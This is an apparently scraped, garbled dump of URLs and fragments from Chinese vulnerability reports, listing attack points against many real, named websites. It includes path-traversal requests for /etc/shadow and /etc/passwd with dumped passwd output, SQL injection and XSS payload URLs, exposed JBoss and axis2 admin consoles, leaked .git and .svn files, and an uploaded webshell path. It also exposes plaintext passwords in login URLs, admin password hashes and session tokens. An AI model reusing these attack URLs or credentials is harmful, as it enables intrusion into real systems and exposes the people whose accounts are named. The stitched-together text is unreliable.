http://**.**.**.**/kebiao_info.asp?ID=456 http://**.**.**.**:3333 http://**.**.**.**/index.html http://zhaopin.chd.com.cn/hr/jobinfo.jsp?id=7927 http://zhaopin.chd.com.cn/hr/jobinfo.jsp?id=7927 http://zhaopin.chd.com.cn/hr/jobinfo.jsp?id=7927 http://wlyxxy.open.com.cn/%E8%AF%BE%E7%A8%8B%E5%AD%A6%E4%B9%A0.html http://wlyxxy.open.com.cn/课程学习详细页.aspx?courseid=70ce6e62-c34c-49fa-8cb9-b1ac755f8528 www.dichan.com http://yuanda.zhongyuanauto.com/news.php?id=2 http://car.zhongyuanauto.com/brand.php?relevance=toyota http://www.zhongyuanauto.com/about.php?t=introduction dhgate.com/123456 mall.jzq001.com/plugin.php?id=mall&type=shop_search&classid=1829&sortk=addtime&sortv=desc&typeid=1831 http://sunny.dongfeng-nissan.com.cn/usedcaradmin/login.php http://**.**.**.**/content.php?bId=2&mId=2 http://**.**.**.**/phpinfo.php 
http://**.**.**/ http://hr.yto56.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/shadow http://hr.yto56.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../root/.bash_history http://hr.yto56.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/logs/ncMem03/SystemOut.log http://r.ele.me/restapi/v1/restaurants/hlrgm?extras[]=identification http://r.ele.me/restapi/v1/restaurants/ay-cwlmd?extras[]=identification http://120.132.133.83/Login.aspx?returnurl=http%3a%2f%2f120.132.133.83%2fdefault.aspx&conv=84cbb4de-28a9-41e7-bc17-ff51a8257065 www.smartapp4u.com http://www.smartapp4u.com http://cloud.bbn.com.cn:8081/shoppingcart!cartQty.action http://nic.hitsz.edu.cn/mingx.php?id=30 http://www.mca.gov.cn http://www.mca.gov.cn/shell.jsp https://www.batiaoyu.com/ http://**.**.**.**/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**/manage/Main.aspx http://sy.uxin.com/ http://**.**.**/discuz/ http://eduadmin.open.com.cn/login.aspx?Pwd=qxt8324057&URLFrom=open&UserName=qingxt http://js171.com/admin http://www.tourongdai.com/ http://**.**.**.**/ftoa/login http://**.**.**/nsmail/index.php www.darryring.com http://www.darryring.com/nAPI/AddressInfo.ashx?action=getbyid&id=70000 http://111.206.75.119/ http://111.206.75.119/ips-table/ip-cyou.txt http://111.206.75.119/updown/bbs.ds.changyou.com.tgz http://111.206.75.119/updown/adminzsx/discuz_ds.sql http://111.206.75.119/updown/tomcat-7.tgz http://**.**.**.**/web/login.aspx http://**.**.**.**/web/121_1.aspx?tt=1&dbname=国税局_国税局个体户达起征点认定信息表&xq=全部县区&startdate=2015-08-01&enddate=2015-08-28&inf_status=有效&pro_status=全部状态 http://**.**.**.**/tianjinlawyermanager/justice/guide/show.jsp?infoID=IC02000007421 http://www.siridamedia.com/news_detail.php?id=489 www.siridamedia.com http://**.**.**.**/villa/buildinginfor.aspx?id=656 http://**.**.**.**/villa/buildinginfor.aspx?id=656 http://www.loveindds.com/asp/upfile.asp 
http://**.**.**.**/ http://**.**.**.** http://bable.weimob.com/上各种传jsp文件都不被执行,紧接着在http://bable.weimob.com/pages/viewpage.action?pageId=4587846找到了一些有意思的信息。 weimob.com/a123456登陆http://ticket.weimob.com/平台,成功登陆,而且使管理员权限 http://www.weimob.com/ http://bbs.weimob.com/,可自行登陆 www.smartapp4u.com http://www.smartapp4u.com http://**.**.**.**/ http://newkm.cofco.com/ http://nhribpm.cofco.com/ http://nhribook.cofco.chaoxing.com/ http://voc.cofco.com http://c3.cofco.com http://**.**.**.**/view.php?sid=36 http://chao.weixinlc.cn http://qc.light.soufun.com/ http://**.**.**.**/2015/M_classContent.aspx?cid=143 http://**.**.**.**/HuirenWeb/ProductC.aspx?menuname=A02&ShowMenuName=A0203&Kind=DICT0000000064 http://**.**.**.**/Main.aspx# http://**.**.**.**/Main.aspx# http://**.**.**.**/ http://**.**.**.**/xxsearch.action存在SQL注入漏洞,命令如下: http://**.**.**.**/xxsearch.action https://account.13980.com/account/CheckfindPassword1 https://account.13980.com/account/checkfindPassword3 https://account.13980.com/account/CheckfindPassword1 https://account.13980.com/account/checkfindPassword3 https://account.13980.com/member/modifyPhone4 https://account.13980.com/member/modifyPhone5 https://account.13980.com/member/modifyEmail4 https://account.13980.com/member/modifyEmail5 http://gouser.3g.net.cn//userManage/userjson/searchUserbySystemid.action http://**.**.**.**/count.php?aid=1&v=2 http://m.ffan.com http://www.rufengda.com/page/user/user_register.jsp http://**.**.**.**/.svn/entries http://hq.fruitday.com:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27 http://reci.zhenai.com/ http://60.10.8.227:88/login/Login.jsp?logintype=1 http://60.10.8.227:88/page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1%27&hpid=4%27&subCompanyId=1%27&e71415018052415=%27 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash www:x:501:501::/home/www:/bin/bash hadoop:x:502:502::/home/hadoop:/bin/bash rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin http://union.xunlei.com/ http://**.**.**.**/bszn.php?classid=5 http://**.**.**.**/goods/detail!orderDetail?orderInfo.webOrder=ECZD1502111637383YYHGI http://web.7k7k.com/ http://web.7k7k.com:80/ http://**.**.**.**/db/admin.php http://www.flyertea.com/newcomment/index.php/Index/Search/index.html?checkin=&checkout=&keyword=&order=1&type= http://www.lcsd.gov.hk/tc/facilities/facilitieslist/districts.php?ftid=46 http://119.134.251.102/console/ http://**.**.**.** http://**.**.**.**/zengxian/files/upfile/2-1.asp http://www.wjgcxy.com/article.asp?id=703 
http://**.**.**.**/bugs/wooyun-2015-0125506 http://**.**.**.**/chengguo.asp?action=zhanshi&id=2 http://city.jia.com/index.php?areaflag=1 http://oa.kdnet.net/ http://172.18.15.2:6080 https://github.com/filemerge/Utils/blob/ef1571ed590d8491b8a251349eb6c317246fb6bc/.svn/pristine/aa/aa25380d62a9b661f89cc3b410ef5df6fddb9a23.svn-base https://**.**.**.**/poeao/HaitaoRepos/blob/694b0cfc54502302212a8096a626004e9989ab04/env/Servers.txt http://sparepart.dfac.com sparepart.dfac.com/invoker/JMXInvokerServlet http://bank.pingan.com/uddiexplorer/ http://bank.pingan.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://baidu.com&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://123.232.100.133:8080/WEBOA/control/main http://123.232.100.133:8080/jmx-console/ http://123.232.100.133:8080/web-console/ http://123.232.100.133:8080/invoker/JMXInvokerServlet http://www.4008000000.com/ http://www.4008000000.com/uddiexplorer/SetupUDDIExplorer.jsp http://pa18-padwebDMZ9115.instance.paic.com.cn:30351&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/login.aspx?ReturnUrl=%2f http://**.**.**.**/fwpt/scfl.asp?id=54 http://www.pifii.com/ encap:Ethernet E8:4C:C9:D1 addr:113.106.98.92 Bcast:113.106.98.95 Mask:255.255.255.248 e8ff:fe4c:c9d1/64 Scope:Link MTU:1500 packets:95221119 packets:56340346853 txqueuelen:1000 http://**.**.**.**/login.php http://**.**.**.**/login.php http://**.**.**.**/defaultroot/voiture_manager/Voituregetsource.jsp?voitureid=696360&type=chgMotorMan,参数voitureid存在注入 http://113.106.83.122/ReferWebV2/ http://sem.baidu.com/site/forgetone http://dmoa.cofco.com/seeyon/index.jsp http://**.**.**.**/share/.svn/entries http://film.ffan.com/filmSeat/checkSceneTime?sceneNo=20150828094010469005 http://film.ffan.com/filmSeat/checkSceneTime?sceneNo=20150828094010469005 http://**.**.**.**/ 
http://**.**.**.**:80//index.php?a=init&c=index&cid=1&m=search&mid=13&q=1&siteid=1&typeid=54 http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/login/wooyun.jsp http://**.**.**.**/wooyun.jsp http://**.**.**.**:88/wooyun.jsp http://**.**.**.**:9000/**.**.**.** http://mml.sjtu.edu.cn/xwnr.php?newsID=139,此注入点不好检测,需指定注入技术,否则检测不出。 http://mml.sjtu.edu.cn/xwnr.php?newsID=138 http://**.**.**.**/login.aspx http://pos.hisense.com/cn/ http://yjs.nchu.edu.cn/leadmail.asp?id=564 http://tiyu.nchu.edu.cn/type.asp?id=3 http://kyc.axhu.cn/xsc/show.php?ID=26176 http://sie.nchu.edu.cn/channel/content.asp?id=643 http://qk.nchu.edu.cn/showall.asp?id=4 http://zdh.nchu.edu.cn/admin/imgout.asp?id=1 http://www.sttacas.org/xieyijianjie_new.php?id=217 http://wooyun.org/bugs/wooyun-2015-0136465 http://mys8.super8.com.cn:81/Login.aspx http://www.diamondsfx.com/zh-cn/read.jsp?id=48如图所示: https://f.infinitus.com.cn/notice/init.action?noticeType=1 http://**.**.**.**/ http://about.kdnet.net//download.php?file=../../../../../../../../../../etc/passwd root:/***** bin:/sbi***** sbin:/sb***** adm:/sb***** lpd:/s***** sbin:/***** wn:/sbin:/s***** sbin:/***** ews:/et***** uucp:/***** tor:/root:/***** gopher:/***** ftp:/s***** body:/:/s***** aemon:/:/s***** owner:/d***** user:/:/***** arpwatch:/***** ntp:/sbi***** bus:/:/***** daemon:/:***** SSH:/var/empty***** User:/var/lib***** User:/var/li***** daemon:/:/***** pd:/var/lib/avahi-***** tcache:/:/s***** www:/***** Server:/var/l***** OProfile:/***** ver:/var/lib***** er:/etc/X11/***** gdm:/sbi***** ministrator:/home***** alias:/***** http://wooyun.org/bugs/wooyun-2010-0137629 http://zhaopin.chd.com.cn/admin/displayresume.jsp?id=200存在报错注入 http://zhaopin.chd.com.cn/hr/jobsinfo.jsp http://www.xine95533.com/ http://www.xine95533.com/admin/login.php http://211.151.249.76:81/zentao/user-login-L3plbnRhby8=.html http://**.**.**.**/TechFinance/kjjrWeb/kjjrWebAction_getNewsInfoById 
jboss-5.0.0.GA/server/default/deploy/TechFinance.war/ www.10020.net http://222.174.125.19:8081/login.d http://222.174.125.19:8082/login.aspx http://222.174.125.19:8082 http://yt.linekong.com/lookvote.php?vote_id=33 http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417.html http://jxxy.fzu.edu.cn/index.php/Index/view/id/4417'.html http://**.**.**.**/bugs/wooyun-2015-0125437 http://**.**.**.**/ziping.asp?action=pici&id=1 http://www.gdut.edu.cn/newgdut/gdutyx.htm http://**.**.**.**/ http://bangong.aili.com/main.php?m=member&s=admin_orderadder&id=2&type=edit http://bangong.aili.com/main.php?m=member&s=admin_orderadder&edid=20 http://bangong.aili.com/config/ http://bangong.aili.com/includes/ http://bangong.aili.com/log/ http://bangong.aili.com/uploadfile/ http://**.**.**.**/homeAction/getNewsShowAction.action http://its.zte.com.cn/univ/login.aspx http://its.zte.com.cn/univ/ElearningFiles/DL_CLASS_PIC/201508/x.aspx http://**.**.**.**/searchapi.htm http://**.**.**.**:8080/mim/login.jsp http://**.**.**.**:8080/mim/core/ckeditor/cKEditorUpload!downLoadImg.action?imgPatch=../../../../../etc/passwd http://**.**.**.**:8080/mim/core/ckeditor/cKEditorUpload!downLoadImg.action admin:axis2 http://sms.exintong.net:9038/axis2-web/ http://e.dangdang.com/bbs/uc_server http://www.smartapp4u.com/androidService/announcement/toEdit.h?id=11 http://**.**.**.**/findArticle?articleId=222&type=findone http://60.217.235.66:8080/backup_20130826.rar http://61.163.182.31:7001/commons/main/mainframe.html http://61.163.182.31:80 http://61.163.182.31/His/Login.htm http://www.gpsoo.net/index.shtml http://mapoo.10000care.com/user/custCenter.shtml?custid=1000001&remote_url=http%3A%2F%2Fin.gpsoo.net%2F&updateUrl=http%3A%2F%2Fin.gpsoo.net%2F&id=1000346&logout=&locale=zh-cn&type=f&userid=&pid=&is_device=false&lang=&requestSource=&loginUrl=&custname= http://www.kuaipan.cn/ http://jhcard.sinosafe.com.cn/ http://**.**.**.**/Product/List.aspx?ID=10077 http://wooyun.org/bugs/wooyun-2015-0125692 
http://106.39.17.117:8080/ http://106.39.17.117:8080/admin-console/ http://106.39.17.117:8080/UUMC/ http://106.39.17.117:8088/ESSSWebII/ http://nt1.300.cn https://61.185.128.190:8443/ims/ http://**.**.**.**/www/index.php?m=user&c=login http://**.**.**/ http://manage.kefu.189.cn:8002/mobileservice/ http://manage.kefu.189.cn:8002/mobileservice/doLogin.html http://manage.kefu.189.cn:8002/mobileservice/ http://**.**.**.**/datasec.php?id=15386& http://**.**.**.**/forum/query.asp?boardid=0 http://m.jobch263.com/ShowJob.asp?id=11931 http://m.jobch263.com/ShowJob.asp?id=11931 http://sqlmap.org http://**.**.**.**/manage/ http://**.**.**.**/index.php/Home/Product/detail/id/2.html http://wooyun.org/bugs/wooyun-2010-041812 http://ac.qfkd.com.cn/FrameMain.htm http://**.**.**.**/index.php/search http://**.**.**.**/ http://**.**.**.**/user/custCenter.shtml?custid=1000001&remote_url=http%3A%2F%2F**.**.**.**%2F&updateUrl=http%3A%2F%2F**.**.**.**%2F&id=1000346&logout=http%3A%2F%2F**.**.**.**%2F&locale=zh-cn&type=&userid=&pid=&is_device=false&lang=&requestSource=&loginUrl=&custname= http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx http://www.myhostadmin.net/ http://www.myhostadmin.net/domain/DomainMana.asp http://**.**.**.**/ http://**.**.**.**/News/Details.aspx?typeid=gnxw&id=2014112516463300001参数ID过滤不严格导致了sql注入 http://shell.cnfol.com/HotArticle/hot.php?catid=3656&num=10&fnc=3&contid=21324863&ctime=2015-08-21%2019:04:45 http://shell.cnfol.com/article/recomend_newjson.php?id=1975&record=4&len=22&call= http://shell.cnfol.com/3gcnfol/iphoneArticle_json.php?classid=3658&start= http://live.3g.cnfol.com/index.php?r=Images/ImgList&type=1&channel=2 http://live.3g.cnfol.com/index.php?r=Images/Comment&num=0&id=17835&newstitle=&channel= http://web.juhe.cn:8080/environment/air/cityair http://web.juhe.cn:8080/constellation/getAll http://web.juhe.cn:8080/finance/stock/hs cn:8080接口请检查 dir:D:\apache-tomcat-7.0.52\webapps\environment\ cmd:whoami https://www.51jiecai.com/forgotpwd.page?6 
http://3g.xywy.com/ http://3g.i.xywy.com/index/authUser?act=t_3g_login_vcode&refreshTemp=2&mobile=输入点 http://3g.i.xywy.com/index/authUser?act=t_3g_login_vcode&refreshTemp=2&mobile= http://home.xywy.com/user.php?act=attention&uid=2548777&type=atten&token=166b535a0deadd021b5ada0b392c4bbb http://218.76.40.69/ http://218.76.40.69:8080/ http://special.kdnet.net/bxjs/index.php?a=articlelist&c=bxjs&uid=15348870 http://**.**.**.**/index!doIndex http://**.**.**.**/bugs/wooyun-2014-053199 http://fuss10.elemecdn.com/4/b0/b7d57569b358a2af9ab2c59e4aa03html.html http://file.hiall.com.cn/company.zip http://file.hiall.com.cn/HiAll.zip http://file.hiall.com.cn/新建 http://**.**.**.**/zfxxgk/bzsdw/zjj/201308/P020130822285701029247.xls http://astro.nuaa.edu.cn/wp-content/uploads/2010/09/%E8%88%AA%E5%A4%A9%E5%AD%A6%E9%99%A22010%EF%BC%8D2011%E7%AC%AC%E4%B8%80%E5%AD%A6%E6%9C%9F%E8%8B%B1%E8%AF%AD%E5%88%86%E7%8F%AD.xls http://www.shinetour.com/ResetPassword/FindIndex.aspx http://**.**.**.**:8081/mms3.2/ http://kw.xhd.cn:8080/edus/login_page.do http://**.**.**.**/pwd.aspx http://**.**.**.**/login.html---登录页面 http://**.**.**.**/search/ http://10086.gdmmyd.net/main.jsp可以被直接访问,该页面可能为开发人员未完成页面,访问时会有js错误,但利用burpsuite,把js中的var http://menpiao.suning.com/trip-web/scenic/search.htm?searchKey=%3Ch1%3EXSS%3C/h1%3E http://trip.suning.com/corptravel-web/company/companyContr/initEditor.htm http://zhishi.suning.com/zhishitang/backend/uRPhotoBack.action zhishi.suning.com/zhishitang/backend/viewURPhotoReplyList.action?status=0 http://**.**.**.**/ http://**.**.**/${path}/user/login.action http://account.bozhong.com/register/index http://svwtrainnet.csvw.com http://www.17y.com/longart/130208.html http://**.**.**.**/ http://**.**.**.**/IntroDetail.aspx?TID=002700040002 http://**.**.**.**/admin/admin_login.aspx http://120.203.214.96/xsgj/index.jsp http://game.joyup.tv/admin/default/login.html 
http://open.mail.qq.com/cgi-bin/communication?sid=DIBFyfQ1kYxvlhhN&t=open_communication&action=delip&ip=1.1.1.1&ef=js&resp_charset=UTF8 http://open.mail.qq.com/cgi-bin/communication?s=communication&sid=DIBFyfQ1kYxvlhhN&t=open_communication& http://top.gaoloumi.com/citylist.php?id=43 http://top.gaoloumi.com/system/login.php http://soj.sysu.edu.cn/,存在sql注入漏洞,通过sql注入可获取到5万多学生的账号信息等。 http://wg.sflep.com/mainPage/KcDetail.aspx?classid=K201305290001 http://pas.sflep.com/index.php?option=com_readingtrees&view=readingtrees&gradeid=1&Itemid=7 http://mt.mangocity.com/tcpb/index.php?c=login_controller&m=login https://github.com/feiniu7903/feiniu_pet/blob/781d571b8e663ce0c5a98b556a11c1638e22990a/pet/pet_job/src/main/config/const.properties http://117.121.46.15/WBooK/Login.aspx http://**.**.**.**/ www.gzczkj.cn http://www.gzczkj.cn http://www.vcanbio.com/Company_News_Detail.aspx?id=332存在SQL盲注漏洞 http://**.**.**.**/web/gszz.asp?id=327&menuid=328&menu=%EF%BF%BD%EF%BF%BD%CB%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://cms-wpcms.dopool.com/ http://events.sflep.com/mt/index.aspx http://www.cqpds.com.cn/ www.cqpds.com.cn http://**.**.**.**/zfsd/msg_detail.jsp?msg_info_id=20150819105704000001 http://www.myuios.com http://www.myuios.com/diguo.txt http://www.myuios.com/cpp.php http://www.epweike.com http://www.wooyun.org/corps/%E4%B8%80%E5%93%81%E5%A8%81%E5%AE%A2%E7%BD%91 http://oa.ebscn.hk/names.nsf?Login&UserName=albertchan&Password=a22105222&RedirectTo=/weboa/webpage.nsf http://**.**.**.** http://bbs.wasu.cn/ http://bbs.wasu.cn/home.php?mod=task&do=view&id=2 http://bbs.wasu.cn/home.php?mod=task&do=view&id=2 http://bbs.wasu.cn/home.php?mod=task&do=draw&id=2 http://www.qust.edu.cn/ http://www.dfcv.com.cn/ModelPages/Company/Events.aspx?ColumnCode=Achievement http://58.250.68.42**** http://23.91.96.37 https://23.91.96.37 http://219.143.118.86/ http://218.30.99.176/MyDocument/SystemPrompt.aspx http://218.30.99.176/Photo/Asset-20150827163855-asp.aspx a1d1:50c9:9929:b40c%11 
c55:34f3:f591:f68d c55:34f3:f591:f68d%19 http://www.dfcv.com.cn/ModelPages/Company/Board.aspx?type=JS http://222.134.52.40:80/admin/sys/login.aspx http://222.134.52.40:80/admin/sys/login.aspx http://www.dfcv.com.cn/ServiceSite.aspx http://www.iqegg.com/.git/config http://fangvip.ganji.com/hr_v2/?c=Auth&a=login# http://club.super.cn/Excel/exportClubContacts.xls?clubId=&clubPeriodId= http://**.**.**.**/tv?code=stdtbyds http://www.smart2pay.com.tw/qa.php?no=5 http://www.smart2pay.com.tw/events_detail.php?no=255 http://**.**.**.**/video.html?cid=481 http://**.**.**.**/phpinfo.php http://**.**.**.**/admin/ ugc.gs.baofeng.com/login,这个接口了,看厂商回复: http://hz.genshuixue.com/ http://www.genshuixue.com/student_center/profile http://t.cn/RyZCR0F http://www.genshuixue.com/student/profile?user_number=875503478 http://ysh.cpicorp.com.cn/newsimg.asp?id=420 http://ysh.cpicorp.com.cn/newsimg.asp http://**.**.**.**/xzhk.php?id=135 http://www.hall.tsinghua.edu.cn/ http://www.hall.tsinghua.edu.cn/sys http://opensh.suning.com:8080/shsys-admin/contentRecord/list.htm http://opensh.suning.com:8080/shsys-admin/mainTree.htm http://opensh.suning.com:8080/shsys-admin/contentRecord/list.htm http://tc.newp.cn/Default.aspx?bid=112&unit=5 mt.mangocity.com/tcpb/index.php?c=login_controller&m=login http://www.dafengct.com/user/getpwd.html。输入注册手机号,并获取验证码。 wangfang:Passwd1234) http://www.hp1997.com/passport/AjaxValidHasEmail.aspx?email= http://www.hp1997.com/passport/AjaxValidUserName.aspx?username= http://www.hp1997.com/passport/AjaxValidHasPhone.aspx?phone= http://61.155.6.105/ http://eduadmin.open.com.cn/login.aspx?Pwd=qxt8324057&URLFrom=open&UserName=qingxt http://examadmin.open.com.cn/Admin/Index.aspx http://14.29.1.103/iptvurgesys/ http://14.29.1.103/iptvurgesys/front/frontBindUser_toBindUserEdit.action?openId=omMuluPrPiMT1LdhV3JUrCherymM http://www.laiqian.com/index.php?r=ZipoGegu/IpoGegu&ipo_id=147&code=HLI&navIndex1=1 URL:http://oa.ccib.com.cn/InforForWeb/list.asp?id=123 
http://**.**.**.**/shop,选择黑色手表购买 http://oa.bwoil.com/names.nsf?Login http://tongxue.open.com.cn/ cn:17000 http://stu.zoomla.cn/guestbook/Default.aspx?CateID=2这个页面中有个编辑器,点击超链接可以止传附件,抓包修改后缀 http://www.sobot.com/ http://**.**.**.**/view.php?id=83 http://report.dyjk.cn/zhibiao_view.php http://report.dyjk.cn/dangan_view.php?id=250531 http://report.dyjk.cn/dangan.php http://**.**.**.** http://info.iweihai.cn/space.php?user= http://info.iweihai.cn/space.php?user=%df http://www.123youhuo.com/mostpart.php https://github.com/brightliu12/php/blob/87a596df60bc99acfd728d0e0135ede0ee442c14/src/Org/PhpMailer/SendEmail.php http://bj.xinniangjie.com/search_user/a http://**.**.**.**/cn/search.asp?提交=&color=红色&productmodel=7MIL http://**.**.**.**/Zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**:8081/zongg/index.asp http://**.**.**.**/zongg/index.asp[username http://www.creditease.cn/ http://**.**.**.**:9003/axis2-web/ http://**.**.**.**:9000/axis2-admin/ http://jifen.xywy.com/duihuan/c68.html,就选这个铲子来演示了 https://github.com/Hancoson/treebear mongodb://localhost/sx_images http://www.001bank.com/ http://www.tsca.com.tw/house/house_view.asp?no=137 http://www.tsca.com.tw/auction/auction_view.asp?no=980 http://211.151.5.23/vianet/ http://211.151.5.23/vianet/admin.php?s=/Public/login.html http://usa.go.cn/jmx-console/ http://**.**.**.**/searchpage.asp POST:key=123&search=qz&button=%C8%CB%B2%C5%BF%EC%CB%D9%CB%D1%CB%F7 http://www.laiqian.com/index.php?r=zusers/ChangePW www.laiqian.com http://**.**.**.**/infolist.php?id=11&cid=58 www.wapqq.cn http://www.wapqq.cn http://www.smartapp4u.com/androidService/productSdk/toAdd.h?productId=3769 http://www.bjrc.com/erp/erpReg.asp存在POST注入 www.bjrc.com http://www.bjrc.com/ http://**.**.**.**/Article/NewsDeatils.aspx?id=158 http://**.**.**.**/bugs/wooyun-2015-0107138 http://**.**.**.**/ 
http://**.**.**.**/vipchat/setup/ http://**.**.**.**/vipchat/VerifyCodeServlet?var=cookie_username http://**.**.**.**/vipchat/setup/admin.jsp http://210chelejia.make-15088.300.cn http://meimi.make-15088.300.cn/members_login.html http://bbs.edaijia.cn/.git/config http://ysh.cpicorp.com.cn/dq/news.asp http://mail2.glsc.com.cn:8084/names.nsf?Login http://mail2.glsc.com.cn:8093/stcenter.nsf?OpenDatabase http://oa.glsc.com.cn http://quickr.glsc.com.cn:8091/LotusQuickr/gxwd/PageLibrary4825779600335E8A.nsf/h_Toc/ede61a95ab493a984825779600336fca/?OpenDocument http://wooyun.org/bugs/wooyun-2015-0138376一个模板? http://newoa.glsc.com.cn:8082/names.nsf/$users https://ztejindou.com:443/ http://www.smyfinancial.com/ http://files.smyfinancial.com/qr/2ecce08f07f54dada********.jpg http://files.smyfinancial.com/qr http://files.smyfinancial.com/qr/558cab34ed7749c9b2da1f989697469d.jpg http://who.cndns.com/?d=lcy8.cc&s=&checktype=Whois http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** admin:c3949ba59abbe56e057f service:9db06a3742c66ef95e9a http://**.**.**.** admin:5c06308e06a462e72d92|,|wenzhang:e29c4b074ae3b30bc964 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** admin:e8d5e43ff295c3505076fda55fbb4597 http://**.**.**.** http://**.**.**.** admin:1d396b56a512c4825156 http://**.**.**.** admin:1d396b56a512c4825156 http://**.**.**.** qdjiaotong:dfac6a6f80be6322ebc9|,|jiang-lin:8dbc97588be90021a0ea http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** admin:4e575b4a09e9056e9426 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://cmri.hiall.com.cn/mysql.txt http://whois.xinnet.com/domain/whois_login.jsp http://whois.xinnet.com/domain/whois/search.do?method=toRefresh www.itnrw.com/admin http://cmri.hiall.com.cn/1/test.sql http://**.**.**.**:80/static/comment/showmsg_special.php?cid=34&url=editor_ent_film.html&total=3&vid=3 
http://ilovebi.hiall.com.cn/s.php http://**.**.**/login.jsp http://mail2.glsc.com.cn:8084/names.nsf?Login http://mail2.glsc.com.cn:8084/names.nsf/$users http://www.hunliji.com/admin/new_chat# http://www.hunliji.com/admin/new_chat# http://www.jgsteel.cn/oa/ www.jgsteel.cn http://www.jgsteel.cn http://ku.cetools.cn/back/login.asp http://ku.cetools.cn/back/login.asp http://ku.cetools.cn/back/b2b_upimgloads.asp?formname=form1&editname=pic&uppath=/buy2buyupfile&filelx=jpg http://ku.cetools.cn/wooyun123321.asp http://www.mihoyo.com/hsod2_homepage/news.php?id=6 http://op.renrenche.com/ http://www.shenzhenly.cn/Fckeditor/editor/filemanager/connectors/test.html http://ktshop.tcl.com/ http://ktshop.tcl.com:80/ http://www.vivibride.cn/m/arc.php?aid=7928 http://www1.xjmu.edu.cn/KYKFC/admin/login.asp http://haiwai.house.sina.com.cn/news/list?ca=00 http://haiwai.house.sina.com.cn/news/list?ca=-9%df http://218.57.146.147:8333/mp/rest/这个地址 http://218.57.146.147:8042/ http://campus.coolpad.com/index.php?c=schoolRecruitment&cate=1%0a&f=jobPosition&id=dKSg https://112.115.106.162:6443 https://112.115.106.184/por/login_psw.csp?rnd=0.02132954215630889 http://a.bdmob.cn/list.php?parent_id=2&cate_id=12 http://a.bdmob.cn/infolist.php?parent_id=22&cat http://sqlmap.org http://www.ayibang.com http://**.**.**.**/policy/display/9.do https://120.132.48.126/ http://etc.gdut.edu.cn/exam/manager.html http://**.**.**.**:88/qjga/jsp/login.jsp http://**.**.**.**:88 http://www.gpsabc.cn/ http://www.gggps.com/ http://www.gps108.com/ http://www.utraveller.net/ http://www.tbitgps.com:8080 http://www.gpsabc.cn/carAction!getCarByID.do?carId=193362&t=1441103243329 http://www.doyouhike.net:80/ B563E07E7FB4A8F497EC7BAC18231A40:FG=1 www.doyouhike.net http://www.sttacas.org/admin/index.php http://bdzcf.com/zChou/toLogin.do http://**.**.**.**/ http://**.**.**.** https://github.com/gaokuilin/jira_ruby/blob/1d79e7bd8fbd936d2fb1470ca10e30c62ada4092/jira6.rb http://www.mshdai.com/index.php?ctl=help&act=detail&id=14 
